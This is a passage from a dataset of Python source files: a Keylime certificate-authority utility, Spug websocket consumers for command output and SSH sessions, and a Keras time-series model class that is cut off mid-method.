source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
ca_util.py
|
#!/usr/bin/python3
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import sys
import os
import base64
import argparse
import configparser
import datetime
import getpass
import zipfile
import io
import socket
from keylime import revocation_notifier
import threading
import http.server
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import functools
import signal
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader as SafeLoader, SafeDumper as SafeDumper
try:
import simplejson as json
except ImportError:
raise("Simplejson is mandatory, please install")
from keylime import crypto
from keylime import cmd_exec
from keylime import common
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if common.CA_IMPL=='cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif common.CA_IMPL=='openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
from M2Crypto import X509, EVP, BIO
config = configparser.ConfigParser()
config.read(common.CONFIG_FILE)
"""
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage ;
# Create a temporary CA cert and it's private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
"""
# protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
global_password=None
def globalcb(*args):
global global_password
return global_password.encode()
def setpassword(pw):
global global_password
if len(pw)==0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir,name):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
cacert = X509.load_cert('cacert.crt')
ca_pk = EVP.load_key_string(priv[0]['ca'])
cert,pk = ca_impl.mk_signed_cert(cacert,ca_pk,name,priv[0]['lastserial']+1)
with open('%s-cert.crt'%name, 'wb') as f:
f.write(cert.as_pem())
f = BIO.MemoryBuffer()
pk.save_key_bio(f,None)
priv[0][name]=f.getvalue()
f.close()
#increment serial number after successful creation
priv[0]['lastserial']+=1
write_private(priv)
# write out the private key with password
with os.fdopen(os.open("%s-private.pem"%name,os.O_WRONLY | os.O_CREAT,0o600), 'wb') as f:
biofile = BIO.File(f)
pk.save_key_bio(biofile, 'aes_256_cbc', globalcb)
biofile.close()
pk.get_rsa().save_pub_key('%s-public.pem'%name)
cc = X509.load_cert('%s-cert.crt'%name)
if cc.verify(cacert.get_pubkey()):
logger.info("Created certificate for name %s successfully in %s"%(name,workingdir))
else:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
if common.CA_IMPL=='cfssl':
pk_str, cacert, ca_pk, _ = ca_impl.mk_cacert()
elif common.CA_IMPL=='openssl':
cacert, ca_pk, _ = ca_impl.mk_cacert()
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
priv=read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.as_pem())
f = BIO.MemoryBuffer()
ca_pk.save_key_bio(f,None)
priv[0]['ca']=f.getvalue()
f.close()
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
ca_pk.get_rsa().save_pub_key('ca-public.pem')
# generate an empty crl
if common.CA_IMPL=='cfssl':
crl = ca_impl.gencrl([],cacert.as_pem(), pk_str)
elif common.CA_IMPL=='openssl':
crl = ca_impl.gencrl([],cacert.as_pem(),str(priv[0]['ca']))
else:
raise Exception("Unknown CA implementation: %s"%common.CA_IMPL)
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
# Sanity checks...
cac = X509.load_cert('cacert.crt')
if cac.verify():
logger.info("CA certificate created successfully in %s"%workingdir)
else:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir,name,insecure=False):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
# zip up the crt, private key, and public key
with open('cacert.crt','r') as f:
cacert = f.read()
with open("%s-public.pem"%name,'r') as f:
pub = f.read()
with open("%s-cert.crt"%name,'r') as f:
cert = f.read()
with open('cacrl.der','rb') as f:
crl = f.read()
with open('cacrl.pem','r') as f:
crlpem = f.read()
cert_obj = X509.load_cert_string(cert)
serial = cert_obj.get_serial_number()
subject = str(cert_obj.get_subject())
priv = read_private()
private = priv[0][name]
with open("%s-private.pem"%name,'r') as f:
prot_priv = f.read()
#code to create a pem formatted protected private key using the keystore password
# pk = EVP.load_key_string(str(priv[0][name]))
# f = BIO.MemoryBuffer()
# # globalcb will return the global password provided by the user
# pk.save_key_bio(f, 'aes_256_cbc', globalcb)
# prot_priv = f.getvalue()
# f.close()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,private)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
pkg = sf.getvalue()
if insecure:
logger.warn("Unprotected private keys in cert package being written to disk")
with open('%s-pkg.zip'%name,'w') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip'%name,'w',compression=zipfile.ZIP_STORED) as f:
f.writestr('%s-public.pem'%name,pub)
f.writestr('%s-cert.crt'%name,cert)
f.writestr('%s-private.pem'%name,prot_priv)
f.writestr('cacert.crt',cacert)
f.writestr('cacrl.der',crl)
f.writestr('cacrl.pem',crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip"%(name,name))
return pkg,serial,subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile,pemfile):
if config.get('general','ca_implementation')=='openssl':
with open(pemfile,'w') as f:
f.write("")
else:
cmd_exec.run("openssl crl -in %s -inform der -out %s"%(derfile,pemfile),lock=False)
def get_crl_distpoint(cert_path):
cert_obj = X509.load_cert(cert_path)
text= cert_obj.as_text()
incrl=False
distpoint=""
for line in text.split('\n'):
line = line.strip()
if line.startswith("X509v3 CRL Distribution Points:"):
incrl = True
if incrl and line.startswith("URI:"):
distpoint = line[4:]
break
return distpoint
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir,name=None,serial=None):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
if name is not None and serial is not None:
raise Exception("You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = X509.load_cert("%s-cert.crt"%name)
serial = cert.get_serial_number()
#convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt','r') as f:
cacert = f.read()
ca_pk = str(priv[0]['ca'])
crl = ca_impl.gencrl(priv[0]['revoked_keys'],cacert,ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der','wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der","cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir,cert_path):
cwd = os.getcwd()
try:
common.ch_dir(workingdir,logger)
#just load up the password for later
read_private(True)
serveraddr = ('', common.CRL_PORT)
server = ThreadedCRLServer(serveraddr,CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s"%os.path.abspath("cacrl.der"))
with open('cacrl.der','rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d"%(socket.getfqdn(),common.CRL_PORT))
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True:
try:
if os.path.exists('cacrl.der'):
retout = cmd_exec.run("openssl crl -inform der -in cacrl.der -text -noout",lock=False)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(line[13:].decode('utf-8'),"%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow()+datetime.timedelta(hours=6)
if expire<=in1hour:
logger.info("Certificate to expire soon %s, re-issuing"%expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
#server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type',None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s"%revocation)
return
logger.info("Revoking certificate: %s"%serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(revoke_callback,revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning("No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self,crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from ' + str(self.client_address) + ' with uri:' + self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
import glob
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password,salt)
ciphertext = crypto.encrypt(priv_encoded,key)
towrite = {'salt':salt,'priv':ciphertext}
with os.fdopen(os.open('private.yml',os.O_WRONLY | os.O_CREAT,0o600), 'w') as f:
yaml.dump(towrite,f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass("Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml','r') as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password,toread['salt'])
try:
plain = crypto.decrypt(toread['priv'],key)
except ValueError:
raise Exception("Invalid password for keystore")
return yaml.load(plain, Loader=SafeLoader),toread['salt']
else:
if warn:
#file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet."%os.path.abspath("private.yml"))
logger.warning("Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys':[]},base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command',action='store',dest='command',required=True,help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name',action='store',help='the common name of the certificate to create')
parser.add_argument('-d','--dir',action='store',help='use a custom directory to store certificates and keys')
parser.add_argument('-i','--insecure',action='store_true',default=False,help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
if common.DEVELOP_IN_ECLIPSE and len(argv)==1:
argv=['-c','init']
#argv=['-c','create','-n',socket.getfqdn()]
argv=['-c','create','-n','client']
#argv=['-c','pkg','-n','client']
argv=['-c','revoke','-n','client']
argv=['-c','listen','-d','ca']
else:
argv = argv[1:]
# never prompt for passwords in development mode
if common.DEVELOP_IN_ECLIPSE:
setpassword('default')
args = parser.parse_args(argv)
if args.dir==None:
if os.getuid()!=0 and common.REQUIRE_ROOT:
logger.error("If you don't specify a working directory, this process must be run as root to access %s"%common.WORK_DIR)
sys.exit(-1)
workingdir = common.CA_WORK_DIR
else:
workingdir = args.dir
if args.command=='init':
cmd_init(workingdir)
elif args.command=='create':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir,args.name)
elif args.command=='pkg':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir,args.name,args.insecure)
elif args.command=='revoke':
if args.name is None:
logger.error("you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command=='listen':
if args.name is None:
args.name = "%s/RevocationNotifier-cert.crt"%workingdir
logger.warning("using default name for revocation cert %s"%args.name)
cmd_listen(workingdir,args.name)
else:
logger.error("Invalid command: %s"%args.command)
parser.print_help()
sys.exit(-1)
if __name__=="__main__":
try:
main()
except Exception as e:
logger.exception(e)
|
consumers.py
|
# Copyright: (c) OpenSpug Organization. https://github.com/openspug/spug
# Copyright: (c) <spug.dev@gmail.com>
# Released under the MIT License.
from channels.generic.websocket import WebsocketConsumer
from django_redis import get_redis_connection
from apps.setting.utils import AppSetting
from apps.account.models import User
from apps.host.models import Host
from threading import Thread
import json
import time
class ExecConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.token = self.scope['url_route']['kwargs']['token']
self.rds = get_redis_connection()
def connect(self):
self.accept()
def disconnect(self, code):
self.rds.close()
def get_response(self):
response = self.rds.brpop(self.token, timeout=5)
return response[1] if response else None
def receive(self, **kwargs):
response = self.get_response()
while response:
data = response.decode()
self.send(text_data=data)
response = self.get_response()
self.send(text_data='pong')
class SSHConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
kwargs = self.scope['url_route']['kwargs']
self.token = kwargs['token']
self.id = kwargs['id']
self.chan = None
self.ssh = None
def loop_read(self):
while True:
data = self.chan.recv(32 * 1024)
# print('read: {!r}'.format(data))
if not data:
self.close(3333)
break
self.send(bytes_data=data)
def receive(self, text_data=None, bytes_data=None):
data = text_data or bytes_data
if data:
data = json.loads(data)
# print('write: {!r}'.format(data))
resize = data.get('resize')
if resize and len(resize) == 2:
self.chan.resize_pty(*resize)
else:
self.chan.send(data['data'])
def disconnect(self, code):
self.chan.close()
self.ssh.close()
# print('Connection close')
def connect(self):
user = User.objects.filter(access_token=self.token).first()
if user and user.token_expired >= time.time() and user.is_active and user.has_host_perm(self.id):
self.accept()
self._init()
else:
self.close()
def _init(self):
self.send(bytes_data=b'Connecting ...\r\n')
host = Host.objects.filter(pk=self.id).first()
if not host:
self.send(text_data='Unknown host\r\n')
self.close()
try:
self.ssh = host.get_ssh(AppSetting.get('private_key')).get_client()
except Exception as e:
self.send(bytes_data=f'Exception: {e}\r\n'.encode())
self.close()
self.chan = self.ssh.invoke_shell(term='xterm')
self.chan.transport.set_keepalive(30)
Thread(target=self.loop_read).start()
|
mods_model.py
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Created on Mon Jan 11 13:34:37 2019
@author: giang nguyen
@author: stefan dlugolinsky
"""
import io
import json
import logging
import os
import subprocess
import sys
import tempfile
import time
from zipfile import ZipFile
import joblib
import keras
import numpy as np
import pandas as pd
from keras.callbacks import Callback, EarlyStopping, ModelCheckpoint, TensorBoard
from keras.layers import Bidirectional
from keras.layers import Dense
from keras.layers import Flatten
from keras.layers import Input
from keras.layers import RepeatVector
from keras.layers.convolutional import Conv1D
from keras.layers.convolutional import MaxPooling1D
from keras.layers.recurrent import GRU
from keras.layers.recurrent import LSTM
from keras.models import Model
from keras.optimizers import Adam
from keras.preprocessing.sequence import TimeseriesGenerator
from keras_self_attention import SeqSelfAttention
from multiprocessing import Process
from sklearn.preprocessing import MinMaxScaler
from tcn import TCN
import mods.config as cfg
import mods.utils as utl
def launch_tensorboard(port, logdir):
subprocess.call(['tensorboard',
'--logdir', '{}'.format(logdir),
'--port', '{}'.format(port),
'--host', '0.0.0.0',
'--reload_interval', '300',
'--reload_multifile', 'true'])
# TODO: TF2 problem: https://github.com/keras-team/keras/issues/13353
class mods_model:
# generic
__FILE = 'file'
# model
__MODEL = 'model'
__MULTIVARIATE = 'multivariate'
__SEQUENCE_LEN = 'sequence_len'
__MODEL_DELTA = 'model_delta'
__INTERPOLATE = 'interpolate'
__MODEL_TYPE = 'model_type'
__EPOCHS = 'epochs'
__EPOCHS_PATIENCE = 'epochs_patience'
__BLOCKS = 'blocks'
__STACKED_BLOCKS = 'stacked_blocks'
__STEPS_AHEAD = 'steps_ahead'
__BATCH_SIZE = 'batch_size'
__BATCH_NORMALIZATION = 'batch_normalization'
__DROPOUT_RATE = 'dropout_rate'
__DATA_SELECT_QUERY = 'data_select_query'
__TRAIN_TIME_RANGE = 'train_time_range'
__TEST_TIME_RANGE = 'test_time_range'
__WINDOW_SLIDE = 'window_slide'
__TRAIN_TIME_RANGES_EXCLUDED = 'train_time_ranges_excluded'
__TEST_TIME_RANGES_EXCLUDED = 'test_time_ranges_excluded'
# metrics
__TRAINING_TIME = 'training_time'
# scaler
__SCALER = 'scaler'
# sample data
__SAMPLE_DATA = 'sample_data'
__SEP = 'sep'
__SKIPROWS = 'skiprows'
__SKIPFOOTER = 'skipfooter'
__ENGINE = 'engine'
__USECOLS = 'usecols'
def __init__(self, name):
self.name = name
self.config = None
self.model = None
self.__scaler = None
self.sample_data = None
self.__metrics = {}
self.config = self.__default_config()
# saves the contents of the original file (e.g. file in a zip) into a temp file and runs func over it
def __func_over_tempfile(self, orig_file, func, mode='wb', *args, **kwargs):
# create temp file
_, fname = tempfile.mkstemp()
with open(fname, mode) as tf:
# extract model to the temp file
tf.write(orig_file.read())
# call the func over the temp file
result = func(fname, *args, **kwargs)
# remove the temp file
os.remove(fname)
return result
def __save_bytes_in_zip_as_file(self, zip, filename, binary_data):
if sys.version_info >= (3, 6, 0):
with zip.open(filename, mode='w') as f:
f.write(binary_data)
else:
# create temp file
_, fname = tempfile.mkstemp()
# write data into the temp file
with open(fname, 'wb') as tf:
tf.write(binary_data)
# put the temp file into the zip
zip.write(fname, filename)
# remove the temp file
os.remove(fname)
def __get_sample_data_cfg(self):
if mods_model.__SAMPLE_DATA in self.config:
return self.config[mods_model.__SAMPLE_DATA]
return None
def save(self, file):
if not file.lower().endswith('.zip'):
file += '.zip'
logging.info('Saving model: %s' % file)
with ZipFile(file, mode='w') as zip:
self.__save_config(zip, 'config.json')
self.__save_model(zip, self.config[mods_model.__MODEL])
self.__save_scaler(zip, self.config[mods_model.__SCALER])
# self.__save_sample_data(zip, self.__get_sample_data_cfg())
self.__save_metrics(zip, 'metrics.json')
zip.close()
logging.info('Model saved')
return file
def load(self, file):
if not file.lower().endswith('.zip'):
file += '.zip'
logging.info('Loading model: %s' % file)
# -->
# TODO: workaround for https://github.com/keras-team/keras/issues/13353
import keras.backend.tensorflow_backend as tb
tb._SYMBOLIC_SCOPE.value = True
# <--
with ZipFile(file) as zip:
self.__load_config(zip, 'config.json')
self.__load_model(zip, self.config[mods_model.__MODEL])
self.__load_scaler(zip, self.config[mods_model.__SCALER])
# self.__load_sample_data(zip, self.__get_sample_data_cfg())
self.__load_metrics(zip, 'metrics.json')
zip.close()
logging.info('Model loaded')
self.__init()
def __save_config(self, zip, file):
data = json.dumps(self.config)
binary_data = bytes(data, 'utf-8')
self.__save_bytes_in_zip_as_file(zip, file, binary_data)
def __load_config(self, zip, file):
logging.info('Loading model config')
with zip.open(file) as f:
data = f.read()
self.config = json.loads(data.decode('utf-8'))
logging.info('Model config:\n%s' % json.dumps(self.config, indent=True))
def __save_metrics(self, zip, file):
data = json.dumps(self.__metrics)
binary_data = bytes(data, 'utf-8')
self.__save_bytes_in_zip_as_file(zip, file, binary_data)
def __load_metrics(self, zip, file):
logging.info('Loading model metrics')
try:
with zip.open(file) as f:
data = f.read()
self.__metrics = json.loads(data.decode('utf-8'))
logging.info('Model metrics:\n%s' % json.dumps(self.__metrics, indent=True))
except Exception as e:
logging.info('Error: Could not load model metrics [%s]' % str(e))
def __save_model(self, zip, model_config):
logging.info('Saving keras model')
_, fname = tempfile.mkstemp()
self.model.save(fname)
zip.write(fname, model_config[mods_model.__FILE])
os.remove(fname)
logging.info('Keras model saved')
def __load_model(self, zip, model_config):
logging.info('Loading keras model')
with zip.open(model_config[mods_model.__FILE]) as f:
self.model = self.__func_over_tempfile(f, keras.models.load_model)
logging.info('Keras model loaded')
def __save_scaler(self, zip, scaler_config):
logging.info('Saving scaler')
_, fname = tempfile.mkstemp()
joblib.dump(self.__scaler, fname)
zip.write(fname, scaler_config[mods_model.__FILE])
os.remove(fname)
logging.info('Scaler saved')
def __load_scaler(self, zip, scaler_config):
logging.info('Loading scaler')
with zip.open(scaler_config[mods_model.__FILE]) as f:
self.__scaler = joblib.load(f)
logging.info('Scaler loaded')
def __save_sample_data(self, zip, sample_data_config):
if sample_data_config is None:
return
if self.sample_data is None:
logging.info('No sample data was set')
return
logging.info('Saving sample data')
with zip.open(sample_data_config[mods_model.__FILE], mode='w') as f:
self.sample_data.to_csv(
io.TextIOWrapper(f),
sep=sample_data_config[mods_model.__SEP],
skiprows=sample_data_config[mods_model.__SKIPROWS],
skipfooter=sample_data_config[mods_model.__SKIPFOOTER],
engine=sample_data_config[mods_model.__ENGINE],
usecols=lambda col: col in sample_data_config[mods_model.__USECOLS]
)
logging.info('Sample data saved:\n%s' % self.sample_data)
def __load_sample_data(self, zip, sample_data_config):
if sample_data_config is None:
return
logging.info('Loading sample data')
try:
with zip.open(sample_data_config[mods_model.__FILE]) as f:
self.sample_data = pd.read_csv(
io.TextIOWrapper(f),
sep=sample_data_config[mods_model.__SEP],
skiprows=sample_data_config[mods_model.__SKIPROWS],
skipfooter=sample_data_config[mods_model.__SKIPFOOTER],
engine=sample_data_config[mods_model.__ENGINE],
usecols=lambda col: col in sample_data_config[mods_model.__USECOLS]
)
logging.info('Sample data loaded:\n%s' % self.sample_data)
except Exception as e:
logging.info('Sample data not loaded: %s' % e)
def load_data(
self,
path,
sep='\t',
skiprows=0,
skipfooter=0,
engine='python',
usecols=lambda col: [col for col in ['number_of_conn', 'sum_orig_kbytes']],
header=0
):
logging.info(path)
df = pd.read_csv(
open(path),
sep=sep,
skiprows=skiprows,
skipfooter=skipfooter,
engine=engine,
usecols=usecols,
header=header
)
return df
def __default_config(self):
return {
mods_model.__MODEL: {
mods_model.__FILE: 'model.h5',
mods_model.__SEQUENCE_LEN: cfg.sequence_len,
mods_model.__MODEL_DELTA: cfg.model_delta,
mods_model.__INTERPOLATE: cfg.interpolate,
mods_model.__MODEL_TYPE: cfg.model_type,
mods_model.__EPOCHS: cfg.num_epochs,
mods_model.__EPOCHS_PATIENCE: cfg.epochs_patience,
mods_model.__BLOCKS: cfg.blocks,
mods_model.__STACKED_BLOCKS: cfg.stacked_blocks,
mods_model.__STEPS_AHEAD: cfg.steps_ahead,
mods_model.__BATCH_SIZE: cfg.batch_size,
mods_model.__BATCH_NORMALIZATION: cfg.batch_normalization,
mods_model.__DROPOUT_RATE: cfg.dropout_rate,
},
mods_model.__SCALER: {
mods_model.__FILE: 'scaler.pkl'
}
}
def cfg_model(self):
return self.config[mods_model.__MODEL]
def set_multivariate(self, multivariate):
self.cfg_model()[mods_model.__MULTIVARIATE] = multivariate
def get_multivariate(self):
return self.cfg_model()[mods_model.__MULTIVARIATE]
def set_sequence_len(self, sequence_len):
self.cfg_model()[mods_model.__SEQUENCE_LEN] = sequence_len
def get_sequence_len(self):
return self.cfg_model()[mods_model.__SEQUENCE_LEN]
def set_model_delta(self, model_delta):
self.cfg_model()[mods_model.__MODEL_DELTA] = model_delta
def is_delta(self):
return self.cfg_model()[mods_model.__MODEL_DELTA]
def set_interpolate(self, interpolate):
self.cfg_model()[mods_model.__INTERPOLATE] = interpolate
def get_interpolate(self):
return self.cfg_model()[mods_model.__INTERPOLATE]
def set_model_type(self, model_type):
self.cfg_model()[mods_model.__MODEL_TYPE] = model_type
def get_model_type(self):
return self.cfg_model()[mods_model.__MODEL_TYPE]
def set_epochs(self, epochs):
self.cfg_model()[mods_model.__EPOCHS] = epochs
def get_epochs(self):
return self.cfg_model()[mods_model.__EPOCHS]
def set_epochs_patience(self, epochs_patience):
self.cfg_model()[mods_model.__EPOCHS_PATIENCE] = epochs_patience
def get_epochs_patience(self):
return self.cfg_model()[mods_model.__EPOCHS_PATIENCE]
def set_blocks(self, blocks):
self.cfg_model()[mods_model.__BLOCKS] = blocks
def get_blocks(self):
return self.cfg_model()[mods_model.__BLOCKS]
def set_stacked_blocks(self, stacked_blocks):
self.cfg_model()[mods_model.__STACKED_BLOCKS] = stacked_blocks
def get_stacked_blocks(self):
return self.cfg_model()[mods_model.__STACKED_BLOCKS]
def set_steps_ahead(self, steps_ahead):
self.cfg_model()[mods_model.__STEPS_AHEAD] = steps_ahead
def get_steps_ahead(self):
return self.cfg_model()[mods_model.__STEPS_AHEAD]
def set_batch_size(self, batch_size):
self.cfg_model()[mods_model.__BATCH_SIZE] = batch_size
def get_batch_size(self):
return self.cfg_model()[mods_model.__BATCH_SIZE]
def set_batch_normalization(self, batch_normalization):
self.cfg_model()[mods_model.__BATCH_NORMALIZATION] = batch_normalization
def get_batch_normalization(self):
return self.cfg_model()[mods_model.__BATCH_NORMALIZATION]
def set_dropout_rate(self, dropout_rate):
self.cfg_model()[mods_model.__DROPOUT_RATE] = dropout_rate
def get_dropout_rate(self):
return self.cfg_model()[mods_model.__DROPOUT_RATE]
def set_data_select_query(self, data_select_query):
self.cfg_model()[mods_model.__DATA_SELECT_QUERY] = data_select_query
def get_data_select_query(self):
return self.cfg_model()[mods_model.__DATA_SELECT_QUERY]
def set_train_time_range(self, train_time_range):
self.cfg_model()[mods_model.__TRAIN_TIME_RANGE] = train_time_range.to_str()
def get_train_time_range(self):
return self.cfg_model()[mods_model.__TRAIN_TIME_RANGE].from_str()
def set_test_time_range(self, test_time_range):
self.cfg_model()[mods_model.__TEST_TIME_RANGE] = test_time_range.to_str()
def get_test_time_range(self):
return self.cfg_model()[mods_model.__TEST_TIME_RANGE].from_str()
def set_window_slide(self, window_slide):
self.cfg_model()[mods_model.__WINDOW_SLIDE] = window_slide
def get_window_slide(self):
return self.cfg_model()[mods_model.__WINDOW_SLIDE]
def set_train_time_ranges_excluded(self, train_time_ranges_excluded):
try:
train_time_ranges_excluded = [r.to_str() for r in train_time_ranges_excluded]
except Exception as e:
logging.info(str(e))
train_time_ranges_excluded = []
self.cfg_model()[mods_model.__TRAIN_TIME_RANGES_EXCLUDED] = train_time_ranges_excluded
def get_train_time_ranges_ecluded(self):
train_time_ranges_excluded = self.cfg_model()[mods_model.__TRAIN_TIME_RANGES_EXCLUDED]
try:
train_time_ranges_excluded = [r.from_str() for r in train_time_ranges_excluded]
except Exception as e:
logging.info(str(e))
train_time_ranges_excluded = []
return train_time_ranges_excluded
def set_test_time_ranges_excluded(self, test_time_ranges_excluded):
try:
test_time_ranges_excluded = [r.to_str() for r in test_time_ranges_excluded]
except Exception as e:
logging.info(str(e))
test_time_ranges_excluded = []
self.cfg_model()[mods_model.__TEST_TIME_RANGES_EXCLUDED] = test_time_ranges_excluded
def get_test_time_ranges_ecluded(self):
try:
test_time_ranges_excluded = self.cfg_model()[mods_model.__TEST_TIME_RANGES_EXCLUDED]
except Exception as e:
logging.info(str(e))
test_time_ranges_excluded = []
return test_time_ranges_excluded
def set_training_time(self, training_time):
self.__metrics[self.__TRAINING_TIME] = training_time
def get_training_time(self):
# backward compatibility
try:
t = self.cfg_model()[mods_model.__TRAINING_TIME]
if t is not None:
return t
except Exception as e:
logging.info(str(e))
return self.__metrics[self.__TRAINING_TIME]
def get_scaler(self):
if not self.__scaler:
self.__scaler = MinMaxScaler(feature_range=(0, 1))
return self.__scaler
def set_scaler(self, scaler):
self.__scaler = scaler
def set_sample_data(self, df):
self.sample_data = df
def update_metrics(self, metrics):
self.__metrics.update(metrics)
def get_metrics(self):
return self.__metrics
def train(
self,
df_train,
sequence_len=cfg.sequence_len,
